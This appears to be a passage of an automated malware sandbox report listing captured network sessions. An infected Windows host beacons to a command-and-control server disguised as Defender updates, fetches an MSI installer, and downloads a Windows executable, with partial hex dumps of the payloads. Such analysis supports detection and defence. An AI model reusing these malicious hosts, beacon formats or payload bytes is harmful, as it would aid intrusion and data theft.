62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:07.931963921 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:07 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	49828	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:08.219103098 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:09.700627089 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:09 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	49829	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:09.959602118 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:11.500988960 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:11 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	104.21.40.3	443	2876	C:\Windows\System32\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 21:11:04 UTC	115	OUT	GET /klog.php HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows Installer Host: axizlhop.life
2024-12-06 21:11:05 UTC	796	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:04 GMT Content-Type: application/x-msi Content-Length: 978944 Connection: close X-Powered-By: PHP/8.1.29 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RslC3LNJsRNEHsMPjOXes0E5896GBhmXdheZ0gvX857pqcDdVpS9mYWV8BjwsP1Pf3%2FBdkrnKtTx6UzlKeXJJyx%2BgoAfyw59GL4hmPLSnErzeSEqkT37D%2FVCYCGTMYKH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8edf442ecc8919c3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2050&min_rtt=2038&rtt_var=788&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=729&delivery_rate=1368322&cwnd=148&unsent_bytes=0&cid=4b53ebee64a75733&ts=797&x=0"
2024-12-06 21:11:05 UTC	573	IN	Data Raw: d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 00 03 00 fe ff 09 00 06 00 00 00 00 00 00 00 00 00 00 00 0f 00 00 00 01 00 00 00 00 00 00 00 00 10 00 00 03 00 00 00 05 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 44 00 00 00 ce 00 00 00 60 01 00 00 c1 01 00 00 15 02 00 00 16 02 00 00 17 02 00 00 18 02 00 00 19 02 00 00 1a 02 00 00 1b 02 00 00 08 00 00 00 2f 06 00 00 30 06 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: >D`/0
2024-12-06 21:11:05 UTC	1369	IN	Data Raw: 00 00 00 11 00 00 00 12 00 00 00 13 00 00 00 14 00 00 00 15 00 00 00 16 00 00 00 17 00 00 00 18 00 00 00 19 00 00 00 1a 00 00 00 1b 00 00 00 1c 00 00 00 1d 00 00 00 1e 00 00 00 1f 00 00 00 20 00 00 00 2b 00 00 00 22 00 00 00 23 00 00 00 24 00 00 00 25 00 00 00 26 00 00 00 27 00 00 00 28 00 00 00 29 00 00 00 2a 00 00 00 31 00 00 00 2c 00 00 00 2d 00 00 00 2e 00 00 00 2f 00 00 00 30 00 00 00 34 00 00 00 32 00 00 00 3a 00 00 00 3f 00 00 00 35 00 00 00 36 00 00 00 37 00 00 00 38 00 00 00 39 00 00 00 3e 00 00 00 3c 00 00 00 b8 01 00 00 3d 00 00 00 a1 01 00 00 8d 05 00 00 40 00 00 00 41 00 00 00 42 00 00 00 43 00 00 00 8b 05 00 00 fd ff ff ff 46 00 00 00 47 00 00 00 48 00 00 00 49 00 00 00 4a 00 00 00 4b 00 00 00 4c 00 00 00 4d 00 00 00 4e 00 00 00 4f 00 00 00 Data Ascii: +"#$%&'()*1,-./042:?56789><=@ABCFGHIJKLMNO
2024-12-06 21:11:05 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 16 00 02 01 11 00 00 00 0d 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 17 00 00 00 0c 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 04 00 00 00 05 00 00 00 06 00 00 00 07 00 00 00 08 00 00 00 09 00 00 00 0a 00 00 00 0b 00 00 00 0c 00 00 00 0d 00 00 00 0e 00 00 00 0f 00 00 00 10 00 00 00 11 00 00 00 12 00 00 00 13 00 00 00 14 00 00 00 15 00 00 00 fe ff ff ff 18 00 00 00 fe ff ff ff fe ff ff ff e8 01 00 00 1b 00 00 00 1c 00 00 00 1d 00 00 00 1e 00 00 00 1f 00 00 00 20 00 00 00 21 00 00 00 62 00 00 00 23 00 00 00 24 00 00 00 25 00 00 00 26 Data Ascii: !b#$%&
2024-12-06 21:11:05 UTC	1369	IN	Data Raw: 00 85 00 3d 00 7d 00 0c 01 0d 00 75 00 43 00 22 00 d5 00 44 00 d8 00 da 00 01 00 08 00 46 00 53 00 67 00 01 00 07 00 5c 00 06 00 07 00 08 00 4d 00 ee 00 f0 00 f2 00 4b 00 ac 00 5a 00 79 00 50 00 37 00 57 00 56 00 05 00 8a 00 36 00 8c 00 8e 00 01 00 5a 00 37 00 92 00 94 00 58 00 b4 00 b6 00 8c 00 8e 00 01 00 6e 00 60 00 bd 00 bf 00 5a 00 50 00 62 00 63 00 66 00 ca 00 6e 00 30 00 cd 00 83 00 67 00 01 00 68 00 c2 00 c4 00 57 00 98 00 9f 00 6c 00 5a 00 50 00 57 00 98 00 06 00 07 00 57 00 98 00 9f 00 a1 00 07 00 a4 00 67 00 22 00 06 00 05 00 ac 00 af 00 b1 00 06 00 07 00 08 00 06 00 07 00 08 00 07 00 30 00 5a 00 79 00 50 00 37 00 5a 00 79 00 50 00 37 00 ec 00 5a 00 79 00 50 00 8a 00 36 00 8c 00 8e 00 37 00 94 00 01 01 03 01 05 01 0d 00 50 00 22 00 05 01 37 00 Data Ascii: =}uC"DFSg\MKZyP7WV6Z7Xn`ZPbcfn0ghWlZPWWg"0ZyP7ZyP7ZyP67P"7
2024-12-06 21:11:05 UTC	1369	IN	Data Raw: 13 06 00 00 14 06 00 00 15 06 00 00 16 06 00 00 17 06 00 00 18 06 00 00 19 06 00 00 1b 06 00 00 1d 06 00 00 fe ff ff ff 1f 06 00 00 2e 06 00 00 2d 06 00 00 20 06 00 00 21 06 00 00 22 06 00 00 23 06 00 00 24 06 00 00 25 06 00 00 26 06 00 00 27 06 00 00 28 06 00 00 29 06 00 00 2a 06 00 00 2b 06 00 00 2c 06 00 00 fe ff ff ff fe ff ff ff fe ff ff ff fd ff ff ff fd ff ff ff 32 06 00 00 33 06 00 00 34 06 00 00 35 06 00 00 36 06 00 00 37 06 00 00 38 06 00 00 39 06 00 00 3a 06 00 00 3b 06 00 00 3c 06 00 00 3d 06 00 00 3e 06 00 00 3f 06 00 00 40 06 00 00 41 06 00 00 42 06 00 00 43 06 00 00 44 06 00 00 45 06 00 00 46 06 00 00 47 06 00 00 48 06 00 00 49 06 00 00 4a 06 00 00 4b 06 00 00 4c 06 00 00 4d 06 00 00 4e 06 00 00 4f 06 00 00 50 06 00 00 51 06 00 00 52 06 00 Data Ascii: .- !"#$%&'()*+,23456789:;<=>?@ABCDEFGHIJKLMNOPQR
2024-12-06 21:11:05 UTC	1369	IN	Data Raw: 20 69 6e 76 61 6c 69 64 2c 20 74 68 65 20 65 6e 67 69 6e 65 20 77 69 6c 6c 20 74 65 72 6d 69 6e 61 74 65 2c 20 72 65 74 75 72 6e 69 6e 67 20 69 65 73 42 61 64 41 63 74 69 6f 6e 44 61 74 61 2e 54 65 78 74 53 74 79 6c 65 53 69 7a 65 54 68 65 20 73 69 7a 65 20 6f 66 20 74 68 65 20 66 6f 6e 74 20 75 73 65 64 2e 20 54 68 69 73 20 73 69 7a 65 20 69 73 20 67 69 76 65 6e 20 69 6e 20 6f 75 72 20 75 6e 69 74 73 20 28 31 2f 31 32 20 6f 66 20 74 68 65 20 73 79 73 74 65 6d 20 66 6f 6e 74 20 68 65 69 67 68 74 29 2e 20 41 73 73 75 6d 69 6e 67 20 74 68 61 74 20 74 68 65 20 73 79 73 74 65 6d 20 66 6f 6e 74 20 69 73 20 73 65 74 20 74 6f 20 31 32 20 70 6f 69 6e 74 20 73 69 7a 65 2c 20 74 68 69 73 20 69 73 20 65 71 75 69 76 61 6c 65 6e 74 20 74 6f 20 74 68 65 20 70 6f 69 6e Data Ascii: invalid, the engine will terminate, returning iesBadActionData.TextStyleSizeThe size of the font used. This size is given in our units (1/12 of the system font height). Assuming that the system font is set to 12 point size, this is equivalent to the poin
2024-12-06 21:11:05 UTC	1369	IN	Data Raw: 6e 61 74 65 20 6f 66 20 74 68 65 20 75 70 70 65 72 20 6c 65 66 74 20 63 6f 72 6e 65 72 20 6f 66 20 74 68 65 20 62 6f 75 6e 64 69 6e 67 20 72 65 63 74 61 6e 67 6c 65 20 6f 66 20 74 68 65 20 63 6f 6e 74 72 6f 6c 2e 43 6f 6e 74 72 6f 6c 5f 46 69 72 73 74 44 65 66 69 6e 65 73 20 74 68 65 20 63 6f 6e 74 72 6f 6c 20 74 68 61 74 20 68 61 73 20 74 68 65 20 66 6f 63 75 73 20 77 68 65 6e 20 74 68 65 20 64 69 61 6c 6f 67 20 69 73 20 63 72 65 61 74 65 64 2e 45 72 72 6f 72 4d 65 73 73 61 67 65 54 65 6d 70 6c 61 74 65 45 72 72 6f 72 20 66 6f 72 6d 61 74 74 69 6e 67 20 74 65 6d 70 6c 61 74 65 2c 20 6f 62 74 61 69 6e 65 64 20 66 72 6f 6d 20 75 73 65 72 20 65 64 2e 20 6f 72 20 6c 6f 63 61 6c 69 7a 65 72 73 2e 46 65 61 74 75 72 65 44 69 72 65 63 74 6f 72 79 5f 44 69 72 65 Data Ascii: nate of the upper left corner of the bounding rectangle of the control.Control_FirstDefines the control that has the focus when the dialog is created.ErrorMessageTemplateError formatting template, obtained from user ed. or localizers.FeatureDirectory_Dire
2024-12-06 21:11:05 UTC	1369	IN	Data Raw: 20 2b 20 32 35 36 2a 47 20 2b 20 32 35 36 5e 32 2a 42 29 2e 52 65 71 75 69 72 65 64 20 6b 65 79 20 6f 66 20 61 20 44 69 72 65 63 74 6f 72 79 20 74 61 62 6c 65 20 72 65 63 6f 72 64 2e 20 54 68 69 73 20 69 73 20 61 63 74 75 61 6c 6c 79 20 61 20 70 72 6f 70 65 72 74 79 20 6e 61 6d 65 20 77 68 6f 73 65 20 76 61 6c 75 65 20 63 6f 6e 74 61 69 6e 73 20 74 68 65 20 61 63 74 75 61 6c 20 70 61 74 68 2c 20 73 65 74 20 65 69 74 68 65 72 20 62 79 20 74 68 65 20 41 70 70 53 65 61 72 63 68 20 61 63 74 69 6f 6e 20 6f 72 20 77 69 74 68 20 74 68 65 20 64 65 66 61 75 6c 74 20 73 65 74 74 69 6e 67 20 6f 62 74 61 69 6e 65 64 20 66 72 6f 6d 20 74 68 65 20 44 69 72 65 63 74 6f 72 79 20 74 61 62 6c 65 2e 52 65 6d 6f 74 65 20 65 78 65 63 75 74 69 6f 6e 20 6f 70 74 69 6f 6e 2c 20 Data Ascii: + 256G + 256^2B).Required key of a Directory table record. This is actually a property name whose value contains the actual path, set either by the AppSearch action or with the default setting obtained from the Directory table.Remote execution option,
2024-12-06 21:11:05 UTC	1369	IN	Data Raw: 69 6e 65 73 20 74 68 65 20 74 61 62 20 6f 72 64 65 72 20 6f 66 20 74 68 65 20 63 6f 6e 74 72 6f 6c 73 2e 20 54 68 65 20 6c 69 6e 6b 73 20 68 61 76 65 20 74 6f 20 66 6f 72 6d 20 6f 6e 65 20 6f 72 20 6d 6f 72 65 20 63 79 63 6c 65 73 21 48 65 6c 70 54 68 65 20 68 65 6c 70 20 73 74 72 69 6e 67 73 20 75 73 65 64 20 77 69 74 68 20 74 68 65 20 62 75 74 74 6f 6e 2e 20 54 68 65 20 74 65 78 74 20 69 73 20 6f 70 74 69 6f 6e 61 6c 2e 20 43 6f 6e 74 72 6f 6c 43 6f 6e 64 69 74 69 6f 6e 41 20 66 6f 72 65 69 67 6e 20 6b 65 79 20 74 6f 20 74 68 65 20 44 69 61 6c 6f 67 20 74 61 62 6c 65 2c 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 64 69 61 6c 6f 67 2e 43 6f 6e 74 72 6f 6c 5f 41 20 66 6f 72 65 69 67 6e 20 6b 65 79 20 74 6f 20 74 68 65 20 43 6f 6e 74 72 6f 6c 20 74 61 62 6c 65 Data Ascii: ines the tab order of the controls. The links have to form one or more cycles!HelpThe help strings used with the button. The text is optional. ControlConditionA foreign key to the Dialog table, name of the dialog.Control_A foreign key to the Control table
2024-12-06 21:11:05 UTC	1170	IN	Data Raw: 6f 6d 20 61 63 74 69 6f 6e 45 78 74 65 6e 64 65 64 54 79 70 65 54 68 65 20 6e 75 6d 65 72 69 63 20 63 75 73 74 6f 6d 20 61 63 74 69 6f 6e 20 74 79 70 65 20 69 6e 66 6f 20 66 6c 61 67 73 2e 4e 61 6d 65 20 6f 66 20 74 68 65 20 64 69 61 6c 6f 67 2e 48 43 65 6e 74 65 72 69 6e 67 48 6f 72 69 7a 6f 6e 74 61 6c 20 70 6f 73 69 74 69 6f 6e 20 6f 66 20 74 68 65 20 64 69 61 6c 6f 67 20 6f 6e 20 61 20 30 2d 31 30 30 20 73 63 61 6c 65 2e 20 30 20 6d 65 61 6e 73 20 6c 65 66 74 20 65 6e 64 2c 20 31 30 30 20 6d 65 61 6e 73 20 72 69 67 68 74 20 65 6e 64 20 6f 66 20 74 68 65 20 73 63 72 65 65 6e 2c 20 35 30 20 63 65 6e 74 65 72 2e 56 43 65 6e 74 65 72 69 6e 67 56 65 72 74 69 63 61 6c 20 70 6f 73 69 74 69 6f 6e 20 6f 66 20 74 68 65 20 64 69 61 6c 6f 67 20 6f 6e 20 61 20 30 Data Ascii: om actionExtendedTypeThe numeric custom action type info flags.Name of the dialog.HCenteringHorizontal position of the dialog on a 0-100 scale. 0 means left end, 100 means right end of the screen, 50 center.VCenteringVertical position of the dialog on a 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	185.234.216.175	443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 21:11:09 UTC	125	OUT	GET /AdminAccounts.aspx HTTP/1.1 User-Agent: Microsoft-WNS/11.0 Host: security-patches.systems Cache-Control: no-cache
2024-12-06 21:11:10 UTC	252	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:10 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Fri, 06 Dec 2024 08:34:45 GMT ETag: "4e000-62895e318030d" Accept-Ranges: bytes Content-Length: 319488 Connection: close
2024-12-06 21:11:10 UTC	7940	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 80 b9 36 3d c4 d8 58 6e c4 d8 58 6e c4 d8 58 6e 17 aa 5b 6f ce d8 58 6e 17 aa 5d 6f 4c d8 58 6e 17 aa 5c 6f d0 d8 58 6e c2 59 5d 6f db d8 58 6e c2 59 5c 6f d4 d8 58 6e c2 59 5b 6f d0 d8 58 6e 17 aa 59 6f cf d8 58 6e c4 d8 59 6e b2 d8 58 6e ae 59 5d 6f c6 d8 58 6e ae 59 58 6f c5 d8 58 6e ae 59 5a 6f c5 d8 58 6e 52 69 63 68 c4 d8 58 6e 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6=XnXnXn[oXn]oLXn\oXnY]oXnY\oXnY[oXnYoXnYnXnY]oXnYXoXnYZoXnRichXnPEL
2024-12-06 21:11:10 UTC	16384	IN	Data Raw: c7 45 b0 66 4c e7 ea 89 55 b4 a0 44 a1 04 10 88 45 ff c7 45 dc 22 00 00 00 8b 0d 78 a1 04 10 33 d2 89 8d 14 fd ff ff 89 95 18 fd ff ff c7 85 38 fd ff ff 6f 9d ef f4 c6 45 95 40 0f b6 05 bb a0 04 10 99 89 85 0c fd ff ff 89 95 10 fd ff ff a1 d8 a0 04 10 8b 0d dc a0 04 10 89 8d 34 fd ff ff 89 85 30 fd ff ff c6 45 83 5f 8b 15 88 a1 04 10 a1 8c a1 04 10 89 85 2c fd ff ff 89 95 28 fd ff ff 8b 0d 40 a1 04 10 89 8d 24 fd ff ff 8b 15 18 a1 04 10 89 95 20 fd ff ff a0 28 a1 04 10 88 45 96 8b 0d 68 a1 04 10 8b 15 6c a1 04 10 89 8d 04 fd ff ff 89 95 08 fd ff ff 66 0f be 05 3f a0 04 10 66 89 85 9c fe ff ff 33 c9 c7 85 fc fc ff ff 4c 99 fc 6e 89 8d 00 fd ff ff 8b 15 30 a1 04 10 a1 34 a1 04 10 89 85 1c fd ff ff 88 55 97 66 0f b6 0d bc a0 04 10 66 89 8d a0 fe ff ff 8b 15 Data Ascii: EfLUDEE"x38oE@40E_,(@$ (Ehlf?f3Ln04Uff
2024-12-06 21:11:10 UTC	16384	IN	Data Raw: 95 cc fe ff ff 75 0c c7 85 c8 fe ff ff 01 00 00 00 eb 0a c7 85 c8 fe ff ff 00 00 00 00 0f b7 45 f0 85 c0 75 0c c7 85 c4 fe ff ff 01 00 00 00 eb 0a c7 85 c4 fe ff ff 00 00 00 00 0f b6 0d 6b a0 04 10 f7 d1 03 0d 58 a1 04 10 75 14 33 d2 c7 85 e4 fd ff ff 01 00 00 00 89 95 e8 fd ff ff eb 0b 0f 57 c0 66 0f 13 85 e4 fd ff ff 8b 85 c8 fe ff ff 0f af 85 c4 fe ff ff 99 8b f0 0f b6 45 fd 99 8b 4d bc 8b 7d c0 2b c8 1b fa 57 51 8b 95 e8 fd ff ff 52 8b 85 e4 fd ff ff 50 e8 bd 7d 02 00 33 f0 89 35 40 a1 04 10 8b 0d f8 a0 04 10 8b 35 fc a0 04 10 0f be 45 ff 05 4a 36 34 5b 99 89 8d 58 fc ff ff 89 b5 5c fc ff ff 89 85 50 fc ff ff 89 95 54 fc ff ff 8b 95 58 fc ff ff 3b 95 50 fc ff ff 75 44 8b 85 5c fc ff ff 3b 85 54 fc ff ff 75 36 8b 4d bc 8b 55 c0 89 95 a0 fa ff ff 81 c1 Data Ascii: uEukXu3WfEM}+WQRP}35@5EJ64[X\PTX;PuD\;Tu6MU
2024-12-06 21:11:10 UTC	16384	IN	Data Raw: ff ff 75 0c c7 85 c4 fe ff ff 01 00 00 00 eb 0a c7 85 c4 fe ff ff 00 00 00 00 8b 55 d0 f7 d2 0f af 55 b4 0f be 05 92 a0 04 10 33 d0 8b 8d c8 fe ff ff 03 8d c4 fe ff ff 0f af d1 88 55 ff 83 3d 90 a1 04 10 01 0f 85 24 01 00 00 ba 01 00 00 00 66 89 15 50 a1 04 10 0f b6 45 fd f7 d0 99 8b 0d c0 a0 04 10 8b 35 c4 a0 04 10 56 51 52 50 e8 e9 3d 02 00 f7 d0 66 89 45 e4 0f b7 15 50 a1 04 10 89 95 c0 fe ff ff 83 bd c0 fe ff ff 00 74 0e 83 bd c0 fe ff ff 01 74 24 e9 a7 00 00 00 a1 04 a1 04 10 0f af 05 44 a1 04 10 8b 0d 04 a1 04 10 03 c8 89 0d 04 a1 04 10 e9 88 00 00 00 8b 15 f8 a0 04 10 a1 fc a0 04 10 89 95 c0 fa ff ff 89 85 c4 fa ff ff 8b 8d c0 fa ff ff 0b 8d c4 fa ff ff 75 0c c7 85 bc fe ff ff 01 00 00 00 eb 0a c7 85 bc fe ff ff 00 00 00 00 8b 0d d8 a0 04 10 8b 35 Data Ascii: uUU3U=$fPE5VQRP=fEPtt$Du5
2024-12-06 21:11:10 UTC	16384	IN	Data Raw: 89 8d f8 fe ff ff ba 74 00 00 00 66 89 95 fa fe ff ff b8 63 00 00 00 66 89 85 fc fe ff ff b9 68 00 00 00 66 89 8d fe fe ff ff ba 65 00 00 00 66 89 95 00 ff ff ff b8 73 00 00 00 66 89 85 02 ff ff ff b9 2e 00 00 00 66 89 8d 04 ff ff ff ba 73 00 00 00 66 89 95 06 ff ff ff b8 79 00 00 00 66 89 85 08 ff ff ff b9 73 00 00 00 66 89 8d 0a ff ff ff ba 74 00 00 00 66 89 95 0c ff ff ff b8 65 00 00 00 66 89 85 0e ff ff ff b9 6d 00 00 00 66 89 8d 10 ff ff ff ba 73 00 00 00 66 89 95 12 ff ff ff b8 2f 00 00 00 66 89 85 14 ff ff ff b9 76 00 00 00 66 89 8d 16 ff ff ff ba 65 00 00 00 66 89 95 18 ff ff ff b8 72 00 00 00 66 89 85 1a ff ff ff b9 69 00 00 00 66 89 8d 1c ff ff ff ba 66 00 00 00 66 89 95 1e ff ff ff b8 2e 00 00 00 66 89 85 20 ff ff ff b9 61 00 00 00 66 89 8d 22 Data Ascii: tfcfhfefsf.fsfyfsftfefmfsf/fvfefrfifff.f af"
2024-12-06 21:11:10 UTC	16384	IN	Data Raw: e0 03 33 c9 89 45 c4 89 4d c8 eb 22 8b 15 d0 a0 04 10 0b 15 d4 a0 04 10 74 14 0f b7 05 50 a1 04 10 69 c8 34 ad ca d5 66 89 0d 24 a1 04 10 eb 2b 8b 45 cc 99 03 45 bc 13 55 c0 03 45 bc 13 55 c0 89 45 bc 89 55 c0 ba ea 51 08 00 c7 05 f8 a0 04 10 20 d7 b8 e4 89 15 fc a0 04 10 8b 85 54 ff ff ff 83 c0 45 89 85 58 fa ff ff 0f b6 0d bc a0 04 10 c1 e1 06 89 4d e0 a1 5c a1 04 10 99 2d 7a 76 a7 c4 8b 55 e0 0b d0 89 55 e0 8b 85 54 ff ff ff 83 c0 20 89 85 38 fe ff ff 8b 0d e0 a0 04 10 8b 15 e4 a0 04 10 89 95 54 fa ff ff 81 e9 d7 00 00 00 89 0d 5c a1 04 10 0f b7 45 f8 0f b6 4d fe 23 c1 0f b7 55 f8 03 d0 66 89 55 f8 8b 85 38 fe ff ff 03 85 38 fe ff ff b9 fe 01 00 00 2b c8 89 8d b4 fc ff ff 33 d2 88 55 a0 68 04 01 00 00 8d 85 44 f6 ff ff 50 8d 8d fa f8 ff ff 51 8d 4d a0 Data Ascii: 3EM"tPi4f$+EEUEUEUQ TEXM\-zvUUT 8T\EM#UfU88+3UhDPQM
